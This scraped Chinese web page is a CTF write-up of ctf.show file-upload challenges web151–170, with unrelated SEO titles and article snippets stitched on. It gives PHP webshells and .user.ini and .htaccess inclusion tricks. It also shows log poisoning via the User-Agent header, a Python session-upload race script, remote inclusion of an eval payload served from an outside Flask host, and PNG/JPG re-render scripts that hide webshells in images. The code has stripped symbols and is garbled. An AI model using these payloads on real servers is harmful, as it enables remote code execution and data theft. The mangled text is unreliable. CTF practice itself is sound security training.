网站关键词库是怎么做的徐州网站建设咨询

news/2025/9/23 4:10:11/文章来源:
网站关键词库是怎么做的,徐州网站建设咨询,爱游戏app下载官方网站,合肥 企业网站设计公司1.web151 前端验证 前端验证#xff0c;修改html代码#xff0c;上传还有一句话木马的php文件,之后用蚁剑连接即可找到flag ?php eval($_POST[1])?2.web152 后端验证#xff0c;修改mime类型(content-type) burp抓包#xff0c;修改content-type为image/png …1.web151 前端验证 前端验证修改html代码上传还有一句话木马的php文件,之后用蚁剑连接即可找到flag ?php eval($_POST[1])?2.web152 后端验证修改mime类型(content-type) burp抓包修改content-type为image/png 3.web153 .user.ini类 后端验证mime类型只能是图片格式不能有php后缀 .user.ini配置文件 burp抓包上传.user.ini此配置文件时nginx服务的配置文件写入auto_prepend_file2.jpg在上传2.jpg之后把http://d6a3715e-bc9a-4bc2-8e1e-e540b0bbaeaf.challenge.ctf.show/upload/index.php添加到蚁剑中即可读取flag访问此链接时会自动包含2.jpg .user.ini利用需要在此目录下还有php文件user.ini 上传的文件 原有的php文件需要在同一目录下 .user.ini auto_prepend_file 表示在文件头包含 auto_append_file 表示在文件尾包含4.web154 .user.ini类检测文件内容 后端检查文件内容 类型 不能有php需要mime类型为图片格式不能有php后缀 上传.user.ini 写入auto_prepend_file2.png 在上传2.php 写一句话木马 ? eval($_POST[1])?,在把链接加到蚁剑即可读取flag 5.web155 .user.ini类检测文件内容 文件内容中不能有php,图片必须是png格式不能有php后缀 php短标签 ? echo 123;? ?(表达式)? 等价于 ?php echo (表达式)? % echo 123;% script language”php”echo 123; /script6.web156 .user.ini类检测文件内容 文件内容中不能有php,[],图片必须是png格式 不能有php后缀 利用的还是.user.ini,写入auto_prepend_file2.png在上传2.png 写入?php system(cat /var/www/html/flag.???)?访问链接就可得到flag (http://…/upload/index.php) 7.web157 .user.ini类检测文件内容 文件内容中不能有php,[],;, 图片必须是png格式 不能有php后缀 利用的还是.user.ini,写入auto_prepend_file1.png在上传1.png 写入?php system(cat /var/www/html/flag.???)?访问链接就可得到flag (http://…/upload/index.php) 8.web158 .user.ini类检测文件内容 文件内容中不能有php,[],;,{}图片必须是png格式 利用的还是.user.ini,写入auto_prepend_file1.png在上传1.png 写入?php system(cat /var/www/html/flag.???)?访问链接就可得到flag (http://…/upload/index.php) 9.web159 .user.ini类检测文件内容 文件内容中不能有php,[],;,{},()图片必须是png格式 利用的还是.user.ini,写入auto_prepend_file1.png在上传1.png 写入?tac …/f*这里的短链接没是执行不了的访问链接就可得到flag (http://…/upload/index.php) 10.web160 日志包含配和文件上传(.user.ini) 文件内容中不能有php,[],;,{},(),空格log图片必须是png格式 利用的还是.user.ini,写入auto_prepend_file1.png在上传1.png 写入?include/var/lo.g/nginx/access.lo.g?访问链接就可得到 (http://…/upload/index.php),在ua头中写入一句话?php eval($_POST[1])?,再次访问链接 (http://…/upload/index.php)进行命令执行1system(“tac …/f*”)?得到flag 11.web161 日志包含配和文件上传(.user.ini) 检测文件头 绕过getimagesize 这题注意上传直接上传图片是不行的 文件内容中不能有php,[],;,{},(),空格log图片必须是png格式 利用的还是.user.ini,写入auto_prepend_file1.png在上传1.png 写入 GIF89a ?include/var/lo.g/nginx/access.lo.g?访问链接就可得到 (http://…/upload/index.php),在ua头中写入一句话?php eval($_POST[1])?,再次访问链接 (http://…/upload/index.php)进行命令执行1system(“tac …/f*”)?得到flag 12.web162 session包含配和文件上传(.user.ini) 检测文件头 绕过getimagesize 过滤了点日志包含没法用了采用session文件包含 和上题相比过滤了点日志包含就用不了了这里采用的是session包含 先上传png,写入GIF89a?include/tmp/sess_1?,在上传.user.ini写入GIF89a auto_prepend_filepng import requests import threading sessionrequests.session() sess1 #和png后面要包含文件的对应 url1http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/ url2http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload data1{PHP_SESSION_UPLOAD_PROGRESS:?php system(tac ../f*);? } file{file:1 #无所谓 } cookies{PHPSESSID: sess }def write():while True:r session.post(url1,datadata1,filesfile,cookiescookies) def read():while True:r session.get(url2)if flag in r.text:print(r.text)threads [threading.Thread(targetwrite),threading.Thread(targetread)] for t in threads:t.start() ] 13.web163 session包含配和文件上传(.user.ini) 检测文件头 绕过getimagesize 远程文件包含和文件上传(.user.ini) 检测文件头 绕过getimagesize 第二种方法也适用与上一题 1.和上题一样 session包含配和文件上传(.user.ini) 检测文件头 绕过getimagesize 过滤了点日志包含没法用了采用session文件包含 和上题相比过滤了点日志包含就用不了了这里采用的是session包含 先上传png,写入GIF89a?include/tmp/sess_1?,在上传.user.ini写入GIF89a auto_prepend_filepng 2. 可以使用远程文件包含上传.user.ini,需要把ip转换为数字注意远程web服务器需要为路由型这里使用python的flask框架之后在进行命令执行即可 或者传.user.ini和png分别写入以下内容这题不行在上传的一瞬间png文件被删除了 .user.ini GIF89a auto_prepend_filepng png GIF89a ?includehttp://10200352//? from flask import Flask app Flask(__name__) app.route(/) def hello_world():return ?php eval($_POST[1]);? if __name__ __main__:app.run(port80,host0.0.0.0)14.web164 考察png二次渲染 png渲染脚本 ?php $p array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33); $img imagecreatetruecolor(32, 32); for ($y 0; $y sizeof($p); $y 3) {$r $p[$y];$g $p[$y1];$b $p[$y2];$color imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color); } imagepng($img,1.png); //要修改的图片的路径 /* 木马内容 ?$_GET[0]($_POST[1]);?*/?15.web165 考察jpg二次渲染 照片选择这张成功率会高很多 先把这张照片上传到服务器上在把服务器上已经渲染好的照片下载下来使用下载下来的照片使用下方的jpg渲染脚本插入php代码 jpg渲染脚本特别注意需要在linux环境下运行此脚本windows运行无法渲染成功) ?php $miniPayload ?eval($_POST[1]);?; if(!extension_loaded(gd) || !function_exists(imagecreatefromjpeg)) {die(php-gd is not installed); } if(!isset($argv[1])) {die(php jpg_payload.php jpg_name.jpg); } set_error_handler(custom_error_handler); for($pad 0; $pad 1024; $pad) {$nullbytePayloadSize $pad;$dis new DataInputStream($argv[1]);$outStream file_get_contents($argv[1]);$extraBytes 0;$correctImage TRUE;if($dis-readShort() ! 0xFFD8) {die(Incorrect SOI marker);}while((!$dis-eof()) ($dis-readByte() 0xFF)) {$marker $dis-readByte();$size $dis-readShort() - 2;$dis-skip($size);if($marker 0xDA) {$startPos $dis-seek();$outStreamTmp substr($outStream, 0, $startPos) .$miniPayload .str_repeat(\0,$nullbytePayloadSize) .substr($outStream, $startPos);checkImage(_.$argv[1], $outStreamTmp, TRUE);if($extraBytes ! 0) {while((!$dis-eof())) {if($dis-readByte() 0xFF) {if($dis-readByte ! 0x00) {break;}}}$stopPos $dis-seek() - 2;$imageStreamSize $stopPos - $startPos;$outStream substr($outStream, 0, $startPos) .$miniPayload .substr(str_repeat(\0,$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize$imageStreamSize-$extraBytes) .substr($outStream, $stopPos);} elseif($correctImage) {$outStream $outStreamTmp;} else {break;}if(checkImage(payload_.$argv[1], $outStream)) {die(Success!);} else {break;}}} } unlink(payload_.$argv[1]); die(Something\s wrong); function checkImage($filename, $data, $unlink FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage; } function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage FALSE;if(preg_match(/(\d) extraneous bytes before marker/, $errstr, $m)) {if(isset($m[1])) {$extraBytes (int)$m[1];}} } class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order false, $fromString false) {$this-binData ;$this-order $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die(File not exists [.$filename.]);$this-binData file_get_contents($filename);} else {$this-binData $filename;}$this-size strlen($this-binData);}public function seek() {return ($this-size - strlen($this-binData));}public function skip($skip){$this-binData substr($this-binData, $skip);}public function readByte() {if($this-eof()) {die(End Of File);}$byte substr($this-binData, 0, 1);$this-binData substr($this-binData, 1);return ord($byte);}public function readShort() {if(strlen($this-binData) 2) {die(End Of File);}$short substr($this-binData, 0, 2);$this-binData substr($this-binData, 2);if($this-order) {$short (ord($short[1]) 8) ord($short[0]);} else {$short (ord($short[0]) 8) ord($short[1]);}return $short;}public function eof() {return !$this-binData||(strlen($this-binData) 0);} } ?16.web166 考察zip文件上传 17.web167 考察apache配置文件.htaccess FilesMatch \.jpgSetHandler application/x-httpd-php /FilesMatch上传一张图片马即可 18.web168 基础免杀过滤post,get,eval等 ?php $_REQUEST[1]($_REQUEST[2])?19.web169 考察nginx服务器的配置文件.user.ini日志文件包含 服务器是nignx上传.user.ini来进行日志包含 进行包含时要注意在上传文件的目录中需要有index.php文件因为没有index.php文件所以先上传一个index.php文件里面随便写就可以 .user.ini auto_append_file/var/log/nginx/access.log访问上传的文件位置在user-agent写入一句话木马 post传入1system(“tac …/flagaa.php”); 执行即可 20.web170 考察nginx服务器的配置文件.user.ini日志文件包含 服务器是nignx上传.user.ini来进行日志包含 进行包含时要注意在上传文件的目录中需要有index.php文件因为没有index.php文件所以先上传一个index.php文件里面随便写就可以 .user.ini auto_append_file/var/log/nginx/access.log访问上传的文件位置在user-agent写入一句话木马 post传入1system(“tac …/flagaa.php”); 执行即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/911318.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

做网站怎么加视频作文网推荐

做网站怎么加视频作文网推荐

阿里云数据库PolarDB租用价格表,云数据库PolarDB MySQL版2核4GB(通用)、2个节点、60 GB存储空间55元5天,云数据库 PolarDB 分布式版标准版2核16G(通用)57.6元3天,阿里云百科aliyunbaike.com分享…
阅读更多...
12306的网站多少钱做的免费网站建设公司

12306的网站多少钱做的免费网站建设公司

前言C# 11 中即将到来一个可以让重视性能的开发者狂喜的重量级特性,这个特性主要是围绕着一个重要底层性能设施 ref 和 struct 的一系列改进。但是这部分的改进涉及的内容较多,不一定能在 .NET 7(C# 11)做完,因此部分内…
阅读更多...
中国wix网站制作公司wordpress插件安装目录

中国wix网站制作公司wordpress插件安装目录

如今的goverment领导们觉得地图都太抽象,只有google Earth式的应用能引起他们的兴趣,作为为公仆服务的我们自然要学习掌握3D GIS技术来提高zf的执政能力了,于是Sky Line来了,拿到开发手册的时候觉得接口不多应该很容易开发&#x…
阅读更多...
2017湖北建设教育协会网站wordpress 又拍云 缓存

2017湖北建设教育协会网站wordpress 又拍云 缓存

一、什么是逻辑回归 1、逻辑回归(Logistic Regression)是机器学习中的一种分类模型,逻辑回归是一种分类算法,虽然名字中带有回归,但是它与回归之间有一定的联系。由于算法的简单和高效,在实际中应用非常广…
阅读更多...
太原市建设厅官方网站国家专业分类目录

太原市建设厅官方网站国家专业分类目录

在Kotlin中,Lambda表达式是一种简洁的方式来定义匿名函数。Lambda表达式可以作为函数的实际参数或者返回值,使得函数成为高阶函数。本篇博客将介绍Lambda表达式的基本概念以及使用方法,并提供相关的示例代码。 Lambda表达式的基本概念 Lamb…
阅读更多...
网站开发软件三剑客如何修改网站备案号

网站开发软件三剑客如何修改网站备案号

作者:算法&健兮,阿里巴巴数据技术及产品部技术专家 生意参谋介绍 生意参谋是阿里官方打造的全渠道、全链路、一站式数据平台,致力于为用户提供经营分析、市场洞察、客群洞察等多样化数据服务,帮助用户全面提升商业决策效率。…
阅读更多...
毕设网站建设论文医疗网络营销外包

毕设网站建设论文医疗网络营销外包

八位图 16位图几周前,我和Alistair正在研究用于对节点附加到Neo4j数据库中的标签进行建模的代码。 这种工作方式是将32个节点ID的块表示为每个标签的32位位图 ,其中1表示1表示节点具有标签,0表示没有标签。 例如,假设我们有节点…
阅读更多...
泰州北京网站建设无锡市建设招标网站

泰州北京网站建设无锡市建设招标网站

参考:https://blog.csdn.net/qq_45572452/article/details/126620210 1、安装node.js 2、配置环境变量 3、安装xmysql连接数据库cmd窗口输入"npm install -g xmysql"后回车cmd窗口输入"xmysql"后回车,验证xmysql是否安装成功(下图代表安装成功)…
阅读更多...
临沂网站建设平台网站集群建设价格

临沂网站建设平台网站集群建设价格

即时通讯作为互联网的重要应用之一,见证了中国互联网30年发展的辉煌历程。 它从最初的文字交流,发展到如今的语音、视频通话,甚至是虚拟现实社交,已经渗透到生活的社交、娱乐、商务等方方面面,成为现代社会不可或缺的一…
阅读更多...
做网站首选什么语言客户关系管理软件

做网站首选什么语言客户关系管理软件

转换规则如下: if 代表一个菱形问号 if后面的条件代表菱形里的内容↓yes(向下箭头和yes) if同级的else代表右拐向下箭头和no 执行语句块代表一个矩形。 if 今天发工资:先还信用卡的钱if 有剩余:又可以happy了,O(∩_∩)O哈哈~else:…
阅读更多...
大学班级网站建设后台网站下载

大学班级网站建设后台网站下载

1、一般的同名函数 c规定,当一个成员函数被声明为虚函数后,其派生类中的同名函数都自动成为虚函数。因此,在子类重新声明该虚函数时,可以加,也可以不加,但习惯上每一层声明函数时都加virtual,使程序更加清…
阅读更多...
十大设计创意网站wordpress房地产插件

十大设计创意网站wordpress房地产插件

本章概要 基于注解方式管理 Bean 实验一: Bean注解标记和扫描 (IoC)实验二: 组件(Bean)作用域和周期方法注解实验三: Bean属性赋值:引用类型自动装配 (DI)实验四: Bean属性赋值:基本…
阅读更多...
厦门人才网唯一官方网站登录入口html电影网站模板

厦门人才网唯一官方网站登录入口html电影网站模板

8.3.0. 本章内容 第八章主要讲的是Rust中常见的集合。Rust中提供了很多集合类型的数据结构,这些集合可以包含很多值。但是第八章所讲的集合与数组和元组有所不同。 第八章中的集合是存储在堆内存上而非栈内存上的,这也意味着这些集合的数据大小无需在编…
阅读更多...
网站后台密码仁寿网站建设

网站后台密码仁寿网站建设

1. 问题 软件版本: VMware 16.2.1Ubuntu 18 现象 C程序通过Makefile编译,在make过程中卡死,没有任何报错。卡死后任何操作都无反应,无法关机,只能通过任务管理器强行结束VMware忽然出现的这个问题,之前用了…
阅读更多...
招商网站建设方案做微推的网站

招商网站建设方案做微推的网站

其中大部分内容在C API文档的Memory Management章节中得到回答.一些文档比您要求的更容易.有关详细信息,您必须转到源代码.没有人会愿意这样做,除非你选择一个特定的版本. (至少2.7.5,2.7.6,3.3.2之前,3.3.3之前和3.4之前对于不同的人来说将是有趣的.)obmalloc.c文件的来源是您…
阅读更多...
网站系统php源码网赌代理

网站系统php源码网赌代理

电压放大器是电子电路中常用的一种器件,用于将输入信号的电压放大至所需的输出电压。它在许多领域中有着重要的应用,包括通信、音频放大、仪器测量等。以下是电压放大器的一些应用及示例: 信号处理:在许多电子系统中,需…
阅读更多...
博明网站建设闵行区学生成长空间

博明网站建设闵行区学生成长空间

一、配置文件位置 以配置文件启动 Redis 的配置文件位于 Redis 安装目录下,文件名为 redis.conf ( Windows名为redis.windows. conf) 例: # 这里要改成你自己的安装目录 cd ./redis-6.0.8 vim redis.conf redis对配置文件对大小写不敏感 二、配置文件 1、获取当前服务的…
阅读更多...
手机网站下拉刷新网站开发流程包括哪几个步骤?

手机网站下拉刷新网站开发流程包括哪几个步骤?

4.1 1.目标:读懂文件中SVM算法,识别文件中的测试数据是RFID信号或者是LORA信号。 使用训练数据训练模型,并使用testdata测试,对实验结果进行分析并截图形成报告提交。 2.做法: ①读懂两篇博客 ②训练模型弄出来&a…
阅读更多...
做电商与做网站的区别seo网站自动推广

做电商与做网站的区别seo网站自动推广

Linux(ubuntu) – 安装后调配 1. 双系统修改默认启动项: 1. 进入linux, ctrlaltt:打开终端; 2. 输入:sudo gedit /etc/default/grub 3. 修改grub内的值:4. 输入:sudo update-grub 5. 重启验证。2. 修改下载镜像源 1…
阅读更多...
贷款织梦网站模版如何建立一个网站并运行

贷款织梦网站模版如何建立一个网站并运行

题目描述: 若一个数(首位不为零)从左向右读与从右向左读都是一样,我们就将其称之为回文数。例如:给定一个 10进制数 56,将 56加 65(即把56从右向左读),得到 121是一个回文数。又如&…
阅读更多...
最新文章

Copyright @ 2022~2023